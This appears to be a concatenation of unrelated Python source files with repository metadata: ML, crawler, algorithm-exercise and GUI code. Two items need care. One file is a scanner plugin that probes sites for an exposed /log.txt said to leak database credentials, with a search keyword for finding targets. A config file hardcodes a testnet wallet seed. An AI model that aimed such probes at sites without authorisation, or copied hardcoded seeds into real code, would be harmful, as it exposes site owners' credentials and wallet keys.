for obj in bs.find_all('object'):
diffcult = int(obj.find('difficult').string)
if diffcult == 1:
continue
name = obj.find('name').string
obj_names.append(name)
if name in VOC_BBOX_LABEL_NAMES:
label = VOC_BBOX_LABEL_NAMES.index(name)
bndbox_obj = obj.find('bndbox', recursive=False)
y1 = int(float(bndbox_obj.find('ymax').string))
x1 = int(float(bndbox_obj.find('xmax').string))
y2 = int(float(bndbox_obj.find('ymin').string))
x2 = int(float(bndbox_obj.find('xmin').string))
bboxes.append([y1, x1, y2, x2])
labels.append(label)
return img_file_name, bboxes, labels, obj_names, width, height
def parse_voc(train_path):
AnnotationsPath = train_path
xml_fils = os.listdir(AnnotationsPath)
data_list = []
for f in tqdm(xml_fils):
tmp_dict = {}
xml_path = os.path.join(AnnotationsPath, f)
img_file_name, bboxes, labels, obj_names, width, height = parse_voc2012_xml(xml_path)
if len(labels) == 0:
# print(img_file_name)
continue
tmp_dict['file_name'] = img_file_name
tmp_dict['obj'] = {'bbox': bboxes, 'label': labels, 'name': obj_names}
tmp_dict['width'] = width
tmp_dict['height'] = height
data_list.append(tmp_dict)
return data_list
def iou(center_box, other_boxes):
intersection_box = np.where(center_box < other_boxes, center_box, other_boxes)
intersection_area = np.prod(intersection_box, axis=1)
center_box_area = np.prod(center_box)
otherbox_areas = np.prod(other_boxes, axis=1)
ious = intersection_area / (center_box_area + otherbox_areas - intersection_area)
return ious
def classification(k, bboxes, use_alias=True):
"""
:param k: number of clusters
:param bboxes: bounding-box data to cluster
:param use_alias: True means the alias method is used to pick cluster centers; False means numpy's choice method is used
:return:
"""
length = len(bboxes)
center_index = get_centers(k, bboxes, use_alias)
center_coord = bboxes[center_index]
center_tmp = np.zeros_like(center_coord)
ori_dis = np.full(shape=length, fill_value=np.inf)
class_list = np.zeros(shape=length) - 1
times = 1
while np.sum(np.square(center_coord - center_tmp)) > 1e-7:
times += 1
center_tmp = center_coord.copy()
for i in range(k):
new_dis = 1 - iou(center_coord[i], bboxes)
class_list = np.where(ori_dis < new_dis, class_list, i)
ori_dis = np.where(ori_dis < new_dis, ori_dis, new_dis)
# update center
for i in range(k):
center_coord[i] = np.mean(bboxes[class_list == i], axis=0)
return class_list, center_coord
def show_result(raw_data, center_coordinate, class_list, mean_iou):
print('Showing... ...')
colors = [
'#FF0000', '#FFA500', '#FFFF00', '#00FF00', '#228B22',
'#0000FF', '#FF1493', '#EE82EE', '#000000', '#FFA500',
'#00FF00', '#006400', '#00FFFF', '#0000FF', '#FFFACD',
]
use_color = []
for node in class_list:
use_color.append(colors[int(node)])
plt.figure(num=1, figsize=(16, 9))
plt.scatter(x=raw_data[:, 0], y=raw_data[:, 1], c=use_color, s=50, marker='o', alpha=0.3)
plt.scatter(x=center_coordinate[:, 0], y=center_coordinate[:, 1], c='b', s=200, marker='+', alpha=0.8)
plt.title('Mean IOU: %.3f' % mean_iou)
plt.show()
def get_centers(k, bboxes, use_alias):
if use_alias:
centers = [random.randint(a=0, b=len(bboxes))]
tmp_dis = np.full(shape=len(bboxes), fill_value=np.inf)
while len(centers) < k:
for i, center in enumerate(centers):
dis = 1 - iou(center, bboxes)
dis = np.where(dis < tmp_dis, dis, tmp_dis)
probs = dis / np.sum(dis)
# centers.append(np.random.choice(a=len(bboxes), size=1, p=probs)[0])
centers.append(alias_sample(probs, 1)[0])
return centers
else:
return np.random.choice(a=np.arange(len(bboxes)), size=k)
def normalize(data_list):
cluster_x = []
cluster_y = []
for img in data_list:
img_width = img['width']
img_height = img['height']
# box: [ymax, xmax, ymin, xmin]
for box in img['obj']['bbox']:
box_width = box[1] - box[-1]
box_height = box[0] - box[2]
cluster_x.append(box_width / img_width)
cluster_y.append(box_height / img_height)
cluster_x = np.array(cluster_x).reshape(-1, 1)
cluster_y = np.array(cluster_y).reshape(-1, 1)
bboxes = np.hstack([cluster_x, cluster_y])
return bboxes
def kmeans(raw_data, k, use_alias):
class_list, center_coordinate = classification(k, raw_data, use_alias)
return class_list, center_coordinate
def mean_iou(bboxes, class_list, center_coordinate):
ious = []
for label, center in enumerate(center_coordinate):
ious.append(iou(center, bboxes[class_list == label]))
every_class_mean_iou = []
for u in ious:
every_class_mean_iou.append(np.mean(u))
return np.mean(every_class_mean_iou)
def cluster_anchors(voc_path):
if not os.path.exists('./bboxes.pkl'):
voc_train_path = os.path.join(voc_path, 'VOC2012train', 'VOCdevkit', 'VOC2012', 'Annotations')
data_list = parse_voc(voc_train_path)
bboxes = normalize(data_list)
pickle.dump(bboxes, open('./bboxes.pkl', 'wb'))
else:
bboxes = pickle.load(open('./bboxes.pkl', 'rb'))
class_list, center_coordinate = kmeans(bboxes, opt.anchor_num, True)
avg_iou = mean_iou(bboxes, class_list, center_coordinate)
show_result(bboxes, center_coordinate, class_list, avg_iou)
with open('./anchors.txt', 'a') as f:
for wh in center_coordinate[:]:
f.write(str(wh[0] * opt.img_w) + ',' + str(wh[1] * opt.img_h) + '\n')
return center_coordinate, class_list
if __name__ == '__main__':
voc_dir = '/media/dk/MyFiles/Data/VOC/VOC2012train/VOCdevkit/VOC2012/Annotations/'
cluster_anchors(voc_dir)
|
[
"yvlinchiang@gmail.com"
] |
yvlinchiang@gmail.com
|
24e72a47b3f994223ff0c193db2e35e8eaa8b2df
|
b23e4b73832b96fedc229fbf7fa0a5ee9fead44b
|
/server/libs/config.py
|
300dc317428c1b67c1f0233c8b585e33498ecc55
|
[] |
no_license
|
chaeplin/yadashvend
|
d746e4ea6a79add64149fc5112339fe26a580a25
|
295190dee8319821ec0e2b59940cca8b70f2650c
|
refs/heads/master
| 2021-01-12T15:00:13.103716
| 2016-10-29T15:43:00
| 2016-10-29T15:43:00
| 71,659,413
| 1
| 0
| null | 2016-10-23T17:26:57
| 2016-10-22T18:57:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,629
|
py
|
# seed for generate address
BIP32_TESTNET_SEED = 'DRKPuUb97UQHNUHs5ktawTeAdwMsBaHCsLA1JW8iYpK5orXyiKPba3MyTP4sttpzhWdVKNej2TxkhR3WNrQqWGMg64ood5HaXL5Avi9ad5vaqc8U'
# max keys in r_NEW_ADDR_SET
max_keys_in_r_NEW_ADDR_SET = 100
#key prefix
key_prefix = 'testnet:'
# redis
# key for index of key generation
r_ADDR_GEN_INDEX = key_prefix + 'kusubsetindex'
# key for index of sales
r_ORDER_INDEX = key_prefix + 'orderindex'
# SET Unused address pool
r_NEW_ADDR_SET = key_prefix + 'NEW_ADDRS'
r_USED_ADDR_SET = key_prefix + 'USED_ADDRS'
r_SALE_ADDR_SET = key_prefix + 'SALE_ADDRS'
# client list
r_CLIENT_LIST_SET = key_prefix + 'CLIENT_LIST'
# hash key, client,
r_ADDR_CMD_HASH = key_prefix + 'ADDR:'
r_CLIENT_CMD_HASH = key_prefix + 'CLIENT:'
# list for ix tx and blk hash
r_IX_LIST = key_prefix + 'IX_RECEIVED'
r_BK_LIST = key_prefix + 'BK_RECEIVED'
r_MQ_LIST = key_prefix + 'MQ_RECEIVED'
#
r_SALE_PRICE = 0.02
# topic for mqtt
m_SALE_REQ_SUBSCRIBE = 's/req/#'
m_SALE_DIS_PUBLISH = 's/resp/'
#client1
# publish to --> s/req/client1
# {"clientid": "client1", "cmd": "order", "item": xxx, "msgid": xxx}
# {"clientid": "client1", "cmd": "change", "item": xxx, "msgid": xxx}
# {"clientid": "client1", "cmd": "discard", "item": xxx, "msgid": xxx}
# subscribe to --> s/resp/client1
# {"addr": "yyyyy", "val": "ffff", "cmd": "order", "msgid": xxx}
# {"addr": "yyyyy", "val": "ffff", "cmd": "paid", "msgid": xxx}
# {"addr": "yyyyy", "val": "ffff", "cmd": "dscrd", "msgid": xxx}
#
|
[
"chaeplin@gmail.com"
] |
chaeplin@gmail.com
|
4816f423ce7470e056af3a0ef6115af9bd76c32c
|
ad9bd58a3ec8fa08dfcc994d4101ee815a9f5bc0
|
/02_algorithm/programmers/Level4/도둑질.py
|
7d22e81f4529e1e3a2c44f3d9e41eff8f758d60b
|
[] |
no_license
|
wally-wally/TIL
|
93fc1d0e3bc7d030341ed54155294c68c48b4c7d
|
936783bc86f563646c0398c24e2fcaa707f0ed23
|
refs/heads/master
| 2023-04-28T08:59:48.235747
| 2023-04-12T12:06:52
| 2023-04-12T12:06:52
| 195,918,111
| 40
| 7
| null | 2020-09-29T16:20:46
| 2019-07-09T02:31:02
|
Python
|
UTF-8
|
Python
| false
| false
| 596
|
py
|
def solution(money):
    money_length = len(money)
    DP = [0 for _ in range(money_length - 1)]  # case: the first house is robbed
    DP2 = [0 for _ in range(money_length)]  # case: robbing starts from the second house
    # initialization
    DP[0] = money[0]
    DP[1] = money[0]
    DP2[0] = 0
    DP2[1] = money[1]
    for i in range(2, money_length - 1):
        DP[i] = max(DP[i - 2] + money[i], DP[i - 1])
    for i in range(2, money_length):
        DP2[i] = max(DP2[i - 2] + money[i], DP2[i - 1])
    return max(DP[money_length - 2], DP2[money_length - 1])
print(solution([1, 2, 3, 1]))  # 4
|
[
"wallys0213@gmail.com"
] |
wallys0213@gmail.com
|
49323ed787e5f0b7886f1940248e8fa61f45784a
|
61bd955e7d83f7901c8d24fd65d3e59fbb960ff6
|
/Problem2.py
|
135e2316b11026486dbcfbfab157a087ce676363
|
[] |
no_license
|
NinaOwl/ADM_HW1
|
dba0abf9f483ba1ad60f196ee6c9dea89525cc2e
|
08edae46bb87471af44814af785315f52a5005ff
|
refs/heads/main
| 2023-08-21T08:19:04.097651
| 2021-10-10T13:26:54
| 2021-10-10T13:26:54
| 415,559,712
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,995
|
py
|
# birthday-cake-candles https://www.hackerrank.com/challenges/birthday-cake-candles/problem
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'birthdayCakeCandles' function below.
#
# The function is expected to return an INTEGER.
# The function accepts INTEGER_ARRAY candles as parameter.
#
def birthdayCakeCandles(candles):
# Write your code here
maxim = max(candles)
count = 0
for i in range(len(candles)):
if candles[i] == maxim:
count +=1
return count
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
candles_count = int(input().strip())
candles = list(map(int, input().rstrip().split()))
result = birthdayCakeCandles(candles)
fptr.write(str(result) + '\n')
fptr.close()
#kangaroo https://www.hackerrank.com/challenges/kangaroo/problem
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'kangaroo' function below.
#
# The function is expected to return a STRING.
# The function accepts following parameters:
# 1. INTEGER x1
# 2. INTEGER v1
# 3. INTEGER x2
# 4. INTEGER v2
#
def kangaroo(x1, v1, x2, v2):
# Write your code here
result = "NO"
if (x1-x2)*(v2-v1) > 0:
if (x1-x2)%(v2-v1) ==0:
result = "YES"
if x1 == x2 and v1 == v2:
result = "YES"
return (result)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
first_multiple_input = input().rstrip().split()
x1 = int(first_multiple_input[0])
v1 = int(first_multiple_input[1])
x2 = int(first_multiple_input[2])
v2 = int(first_multiple_input[3])
result = kangaroo(x1, v1, x2, v2)
fptr.write(result + '\n')
fptr.close()
#viral advertising https://www.hackerrank.com/challenges/strange-advertising/problem
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'viralAdvertising' function below.
#
# The function is expected to return an INTEGER.
# The function accepts INTEGER n as parameter.
#
def viralAdvertising(n):
r = 5
likes = 0
for i in range(n):
likes = likes + r//2
r = r//2 * 3
# Write your code here
return likes
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input().strip())
result = viralAdvertising(n)
fptr.write(str(result) + '\n')
fptr.close()
#Digit sum https://www.hackerrank.com/challenges/recursive-digit-sum/problem
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'superDigit' function below.
#
# The function is expected to return an INTEGER.
# The function accepts following parameters:
# 1. STRING n
# 2. INTEGER k
#
def superDigit(n, k):
# Write your code here
l = int(n)
summ = l%10
l = l//10
while l > 0:
summ += l%10
l = l//10
l = summ * k
while l > 9:
summ = 0
while l > 0:
summ += l%10
l = l//10
l = summ
return l
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
first_multiple_input = input().rstrip().split()
n = first_multiple_input[0]
k = int(first_multiple_input[1])
result = superDigit(n, k)
fptr.write(str(result) + '\n')
fptr.close()
#InsertionSort1 https://www.hackerrank.com/challenges/insertionsort1/problem
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'insertionSort1' function below.
#
# The function accepts following parameters:
# 1. INTEGER n
# 2. INTEGER_ARRAY arr
#
def insertionSort1(n, arr):
el = arr[n - 1]
i = n - 1
while arr[i - 1] >= el:
print(*(arr[:(i-1)+1] + [arr[i-1]] + arr[(i-1)+1:(n-1)]), sep = " ")
i-=1
if i < 1:
break
print (*(arr[:(i-1)+1] + [el] + arr[(i-1)+1:(n-1)]), sep = " ")
# Write your code here
if __name__ == '__main__':
n = int(input().strip())
arr = list(map(int, input().rstrip().split()))
insertionSort1(n, arr)
#InsertionSort2 https://www.hackerrank.com/challenges/insertionsort2/problem
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'insertionSort2' function below.
#
# The function accepts following parameters:
# 1. INTEGER n
# 2. INTEGER_ARRAY arr
#
def insertionSort1(n, arr):
#print(n-1)
#print(arr)
el = arr[n - 1]
i = n - 1
while arr[i - 1] >= el:
#arr = (arr[:(i-1)+1] + [arr[i-1]] + arr[(i-1)+1:(n-1)]), sep = " ")
i-=1
if i < 1:
break
return (arr[:i] + [el] + arr[i:n-1] + arr[n:len(arr)])
def insertionSort2(n, arr):
for i in range(n-1):
arr = insertionSort1(i+2, arr)
print(*arr)
# Write your code here
if __name__ == '__main__':
n = int(input().strip())
arr = list(map(int, input().rstrip().split()))
insertionSort2(n, arr)
|
[
"noreply@github.com"
] |
NinaOwl.noreply@github.com
|
e5d99ee86fa8bccd4aad485ec8314e1749a15a00
|
27790d89433cf1cfb8a0ad636ba76c24ec66b7ff
|
/naver_webtoon_crawling.py
|
a6a5c8a3ffb16bb10cf7a42b8520fb09cbd29067
|
[] |
no_license
|
capston123/back_end
|
5625037f0b3bf6f3ae0cb5a75ff19ce781090784
|
9687f225495364d226aee34ac044f2f4a280881f
|
refs/heads/master
| 2023-04-09T19:03:58.639126
| 2021-04-12T18:02:44
| 2021-04-12T18:02:44
| 311,255,740
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,280
|
py
|
"""
1. Save the results as a class?
2. Crawl only the webtoons updated between 23:00 and 24:00?
"""
import django
from datetime import date
from selenium import webdriver
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "contents.settings")
django.setup()
from webtoons.models import Naver
save_data = []
today_date = date.today()
# set the Chrome window size
options = webdriver.ChromeOptions()
options.add_argument('window-size=1920,1080')
URL_webtoon_home = 'https://comic.naver.com/webtoon/weekday.nhn'
driver = webdriver.Chrome('chromedriver89', options=options)
# wait for the response
driver.implicitly_wait(5)
# go to the webtoon home page
driver.get(url=URL_webtoon_home)
# li tag
li_list = driver.find_elements_by_css_selector(
'#content > div.list_area.daily_all > div.col.col_selected > div > ul > li')
for i in range(5):
    # li tag
    li_list = driver.find_elements_by_css_selector(
        '#content > div.list_area.daily_all > div.col.col_selected > div > ul > li')
    # webtoon title
    webtoon_title = li_list[i].text.replace(
        'NEW\n', '').replace('18세 이상 이용 가능\n', '').replace('컷툰\n', '')
    # webtoon url
    webtoon_url = li_list[i].find_element_by_css_selector(
        'div > a').get_attribute('href')
    # webtoon status; ico_updt == update finished
    webtoon_status = li_list[i].find_element_by_css_selector(
        'div > a > em').get_attribute('class')
    # wait for the response
    driver.implicitly_wait(5)
    # go to the webtoon url
    driver.get(url=webtoon_url)
    # webtoon author
    webtoon_author = driver.find_element_by_css_selector(
        '#content > div.comicinfo > div.detail > h2')
    webtoon_author = webtoon_author.find_element_by_class_name('wrt_nm').text
    # webtoon thumbnail
    webtoon_thumbnail = driver.find_element_by_css_selector(
        '#content > div.comicinfo > div.thumb > a > img').get_attribute('src')
    # webtoon category
    webtoon_category = driver.find_element_by_css_selector(
        '#content > div.comicinfo > div.detail > p.detail_info > span.genre').text
    webtoon_category = webtoon_category.replace(" ", '')
    recent_thumbnail = ''
    recent_url = ''
    recent_title = ''
    try:
        # thumbnail of the latest episode
        recent_thumbnail = driver.find_element_by_css_selector(
            '#content > table > tbody > tr:nth-child(2) > td:nth-child(1) > a > img').get_attribute('src')
        # url of the latest episode
        recent_url = driver.find_element_by_css_selector(
            '#content > table > tbody > tr:nth-child(2) > td.title > a').get_attribute('href')
        # title of the latest episode
        recent_title = driver.find_element_by_css_selector(
            '#content > table > tbody > tr:nth-child(2) > td.title > a').text
    except:
        # thumbnail of the latest episode
        recent_thumbnail = driver.find_element_by_css_selector(
            '#content > table > tbody > tr:nth-child(3) > td:nth-child(1) > a > img').get_attribute('src')
        # url of the latest episode
        recent_url = driver.find_element_by_css_selector(
            '#content > table > tbody > tr:nth-child(3) > td.title > a').get_attribute('href')
        # title of the latest episode
        recent_title = driver.find_element_by_css_selector(
            '#content > table > tbody > tr:nth-child(3) > td.title > a').text
    print("제목 : " + webtoon_title +
          "\n작가 : " + webtoon_author +
          "\n카테고리 : " + webtoon_category +
          "\n업데이트 상태 : " + webtoon_status +
          "\n썸네일 : " + webtoon_thumbnail +
          "\nURL : " + webtoon_url +
          "\n최신 작품 제목 : " + recent_title +
          "\n최신 작품 썸네일 : " + recent_thumbnail +
          "\n최신 작품 URL : " + recent_url + "\n")
    temp_data = []
    temp_data.append(webtoon_title+' '+recent_title)
    temp_data.append(recent_url)
    temp_data.append(recent_thumbnail)
    temp_data.append(webtoon_category)
    save_data.append(temp_data)
    # wait for the response
    driver.implicitly_wait(5)
    # go back to the webtoon home page
    driver.get(url=URL_webtoon_home)
for name, url, image, category in save_data:
    obj = Naver(name=name, url=url, image=image, category=category)
    obj.save()
driver.close()
|
[
"sunsu2737@gmail.com"
] |
sunsu2737@gmail.com
|
6d5a54b10e007cacf22f064a0fcd21ac7e0bfe12
|
ba2b72c485ca6f8e62e7ca7c0286ac41641f85a9
|
/openrec/utils/samplers/pointwise_sampler.py
|
baef51f6af781bc7a0eeb752add3d41f5e613736
|
[
"Apache-2.0"
] |
permissive
|
christinatsan/openrec
|
8a2a9f411a51f853f88fe79a25304ea53c79bf81
|
f4eb2fda42818705053b775facfa34921dcd5762
|
refs/heads/master
| 2021-05-16T14:39:55.245752
| 2018-01-22T16:43:26
| 2018-01-22T16:43:26
| 118,484,419
| 0
| 0
| null | 2018-01-22T16:36:28
| 2018-01-22T16:36:28
| null |
UTF-8
|
Python
| false
| false
| 2,411
|
py
|
import numpy as np
import random
from multiprocessing import Process
from openrec.utils.samplers import Sampler
class _PointwiseSampler(Process):
def __init__(self, dataset, batch_size, pos_ratio, q):
self._dataset = dataset
self._batch_size = batch_size
self._num_pos = int(batch_size * pos_ratio)
self._user_list = self._dataset.get_unique_user_list()
self._q = q
self._state = 0
super(_PointwiseSampler, self).__init__()
def run(self):
while True:
input_npy = np.zeros(self._batch_size, dtype=[('user_id_input', np.int32),
('item_id_input', np.int32),
('labels', np.float32)])
if self._state + self._num_pos >= len(self._dataset.data):
self._state = 0
self._dataset.shuffle()
for ind in range(self._num_pos):
entry = self._dataset.data[self._state + ind]
input_npy[ind] = (entry['user_id'], entry['item_id'], 1.0)
for ind in range(self._batch_size - self._num_pos):
user_ind = int(random.random() * (len(self._user_list) - 1))
user_id = self._user_list[user_ind]
neg_id = int(random.random() * (self._dataset.max_item() - 1))
while neg_id in self._dataset.get_interactions_by_user_gb_item(user_id):
neg_id = int(random.random() * (self._dataset.max_item() - 1))
input_npy[ind + self._num_pos] = (user_id, neg_id, 0.0)
self._state += self._num_pos
self._q.put(input_npy, block=True)
class PointwiseSampler(Sampler):
def __init__(self, dataset, batch_size, pos_ratio=0.5, num_process=5, chronological=False):
self._pos_ratio = pos_ratio
self._chronological = chronological
if chronological:
num_process = 1
super(PointwiseSampler, self).__init__(dataset=dataset, batch_size=batch_size, num_process=num_process)
def _get_runner(self):
return _PointwiseSampler(dataset=self._dataset,
pos_ratio=self._pos_ratio,
batch_size=self._batch_size,
q=self._q)
|
[
"ylongqi@gmail.com"
] |
ylongqi@gmail.com
|
c702c82bd6cb53a5ba57c999529361d2ef38e4b0
|
0db05f7b843e8450bafd5ae23f8f70f9a9a8c151
|
/Src/StdLib/Lib/site-packages/pythonwin/pywin/framework/bitmap.py
|
6d6bcd5ecbe4a4a1e59b87f1a7d7b8583e8d26f7
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"BSD-3-Clause",
"Python-2.0",
"LGPL-2.0-only"
] |
permissive
|
IronLanguages/ironpython2
|
9c7f85bd8e6bca300e16f8c92f6384cecb979a6a
|
d00111890ce41b9791cb5bc55aedd071240252c4
|
refs/heads/master
| 2023-01-21T21:17:59.439654
| 2023-01-13T01:52:15
| 2023-01-13T01:52:15
| 91,620,472
| 1,171
| 288
|
Apache-2.0
| 2023-01-13T01:52:16
| 2017-05-17T21:11:51
|
Python
|
UTF-8
|
Python
| false
| false
| 4,646
|
py
|
import win32ui
import win32con
import win32api
import string
import os
import app
import sys
from pywin.mfc import docview, window
bStretch = 1
class BitmapDocument(docview.Document):
"A bitmap document. Holds the bitmap data itself."
def __init__(self, template):
docview.Document.__init__(self, template)
self.bitmap=None
def OnNewDocument(self):
# I can not create new bitmaps.
win32ui.MessageBox("Bitmaps can not be created.")
def OnOpenDocument(self, filename):
self.bitmap=win32ui.CreateBitmap()
# init data members
f = open(filename, 'rb')
try:
try:
self.bitmap.LoadBitmapFile(f)
except IOError:
win32ui.MessageBox("Could not load the bitmap from %s" % filename)
return 0
finally:
f.close()
self.size = self.bitmap.GetSize()
return 1
def DeleteContents(self):
self.bitmap=None
class BitmapView(docview.ScrollView):
"A view of a bitmap. Obtains data from document."
def __init__(self, doc):
docview.ScrollView.__init__(self, doc)
self.width = self.height = 0
# set up message handlers
self.HookMessage (self.OnSize, win32con.WM_SIZE)
def OnInitialUpdate(self):
doc = self.GetDocument()
if doc.bitmap:
bitmapSize = doc.bitmap.GetSize()
self.SetScrollSizes(win32con.MM_TEXT, bitmapSize)
def OnSize (self, params):
lParam = params[3]
self.width = win32api.LOWORD(lParam)
self.height = win32api.HIWORD(lParam)
def OnDraw (self, dc):
# set sizes used for "non stretch" mode.
doc = self.GetDocument()
if doc.bitmap is None: return
bitmapSize = doc.bitmap.GetSize()
if bStretch:
# stretch BMP.
viewRect = (0,0,self.width, self.height)
bitmapRect = (0,0,bitmapSize[0], bitmapSize[1])
doc.bitmap.Paint(dc, viewRect, bitmapRect)
else:
# non stretch.
doc.bitmap.Paint(dc)
class BitmapFrame(window.MDIChildWnd):
def OnCreateClient( self, createparams, context ):
borderX = win32api.GetSystemMetrics(win32con.SM_CXFRAME)
borderY = win32api.GetSystemMetrics(win32con.SM_CYFRAME)
titleY = win32api.GetSystemMetrics(win32con.SM_CYCAPTION) # includes border
# try and maintain default window pos, else adjust if cant fit
# get the main client window dimensions.
mdiClient = win32ui.GetMainFrame().GetWindow(win32con.GW_CHILD)
clientWindowRect=mdiClient.ScreenToClient(mdiClient.GetWindowRect())
clientWindowSize=(clientWindowRect[2]-clientWindowRect[0],clientWindowRect[3]-clientWindowRect[1])
left, top, right, bottom=mdiClient.ScreenToClient(self.GetWindowRect())
# width, height=context.doc.size[0], context.doc.size[1]
# width = width+borderX*2
# height= height+titleY+borderY*2-1
# if (left+width)>clientWindowSize[0]:
# left = clientWindowSize[0] - width
# if left<0:
# left = 0
# width = clientWindowSize[0]
# if (top+height)>clientWindowSize[1]:
# top = clientWindowSize[1] - height
# if top<0:
# top = 0
# height = clientWindowSize[1]
# self.frame.MoveWindow((left, top, left+width, top+height),0)
window.MDIChildWnd.OnCreateClient(self, createparams, context)
return 1
class BitmapTemplate(docview.DocTemplate):
def __init__(self):
docview.DocTemplate.__init__(self, win32ui.IDR_PYTHONTYPE, BitmapDocument, BitmapFrame, BitmapView)
def MatchDocType(self, fileName, fileType):
doc = self.FindOpenDocument(fileName)
if doc: return doc
ext = os.path.splitext(fileName)[1].lower()
if ext =='.bmp': # removed due to PIL! or ext=='.ppm':
return win32ui.CDocTemplate_Confidence_yesAttemptNative
return win32ui.CDocTemplate_Confidence_maybeAttemptForeign
# return win32ui.CDocTemplate_Confidence_noAttempt
# For debugging purposes, when this module may be reloaded many times.
try:
win32ui.GetApp().RemoveDocTemplate(bitmapTemplate)
except NameError:
pass
bitmapTemplate = BitmapTemplate()
bitmapTemplate.SetDocStrings('\nBitmap\nBitmap\nBitmap (*.bmp)\n.bmp\nPythonBitmapFileType\nPython Bitmap File')
win32ui.GetApp().AddDocTemplate(bitmapTemplate)
# This works, but just didnt make it through the code reorg.
#class PPMBitmap(Bitmap):
# def LoadBitmapFile(self, file ):
# magic=file.readline()
# if magic <> "P6\n":
# raise TypeError, "The file is not a PPM format file"
# rowcollist=string.split(file.readline())
# cols=string.atoi(rowcollist[0])
# rows=string.atoi(rowcollist[1])
# file.readline() # whats this one?
# self.bitmap.LoadPPMFile(file,(cols,rows))
def t():
bitmapTemplate.OpenDocumentFile('d:\\winnt\\arcade.bmp')
#OpenBMPFile( 'd:\\winnt\\arcade.bmp')
def demo():
import glob
winDir=win32api.GetWindowsDirectory()
for fileName in glob.glob1(winDir, '*.bmp')[:2]:
bitmapTemplate.OpenDocumentFile(os.path.join(winDir, fileName))
|
[
"pawel.jasinski@gmail.com"
] |
pawel.jasinski@gmail.com
|
4777c5b5c8a5917975b15e51607d87d7d16d0173
|
c048d2cb39d391cdbf530523eb2832d44dce708a
|
/Plugins/digital_campus/campus_log_disclosure.py
|
e5c5ab2044e188213d0310aaedfbe5ef8cc9b383
|
[] |
no_license
|
z3r023/FrameScan-GUI
|
434655e81a354365ff2cce9c2d714f255d694111
|
e207108fc4e4878d6c66cc72779caed29b788057
|
refs/heads/master
| 2020-08-08T12:14:58.074632
| 2019-10-06T10:38:42
| 2019-10-06T10:38:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,394
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: Digital Campus (数字校园平台) platform log file disclosure
referer: http://www.wooyun.org/bugs/wooyun-2014-071575
author: Lucifer
description: Search keyword: intitle:数字校园平台--Digital Campus2.0 Platform. The log.txt log file is exposed, which can leak database credentials and other sensitive information.
'''
import re
import sys
import requests
import warnings
class campus_log_disclosure:
    def __init__(self, url):
        self.url = url
    def run(self):
        result = ['Digital-Campus数字校园平台LOG文件泄露', '', '']
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/log.txt"
        pattern = re.compile(r'\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2}')
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            matches = pattern.findall(req.text)  # use a separate name so the result list is not overwritten
            if len(matches) != 0:
                result[2] = '存在'
                result[1] = vulnurl
            else:
                result[2] = '不存在'
        except:
            result[2] = '未知'
        return result
if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = campus_log_disclosure(sys.argv[1])
    testVuln.run()
|
[
"1919010193@qq.com"
] |
1919010193@qq.com
|
f5fc4d106bf0a2c637b87d9bf0ec63bedd3b338d
|
d727fdbbdd5dd8914811cba33c09d10dd393299e
|
/TrajectoryPlanning/pathLatticeXY3.py
|
e2400d06d121fb0415a5a9adb4919369231e6585
|
[
"MIT"
] |
permissive
|
gaohongfein/PTPSim
|
60030f5c926895c856b6a4f4f48b542a09e84b3e
|
63bc0b7e81846fdd02dc8c105f356595cb9f3d91
|
refs/heads/master
| 2022-01-20T16:35:37.240997
| 2019-08-17T14:45:52
| 2019-08-17T14:45:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,906
|
py
|
"""
MIT License
Copyright (c) 2019 ming
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
===============================
# @File : pathLatticeXY3.py
# @Author: ming.ustb@outlook.com
# @Date : 19-5-20
# @GitHub: https://github.com/yangmingustb/PTPSim
================================
this is pathLattice converted into the xy coordinates
"""
import numpy as np
import Curves.Cubic as cubic
import matplotlib.pyplot as plt
import math
import Scenarios.multiLane as multiLane
import Curves.cubic_spline as cubicSpline
import FrenetMath.FrenetToCartesian as ftc
import model.simModel as car
# Note: there are two "cubic" modules here: one connects two states, the other uses a spline through all waypoints to build the driving environment
showSamplingPath = True
show_obstacle = True
showVehicleStart = True
longitudinal_num = 5
lateral_num = 9  # number of lateral samples
longitudinal_step = 20.0
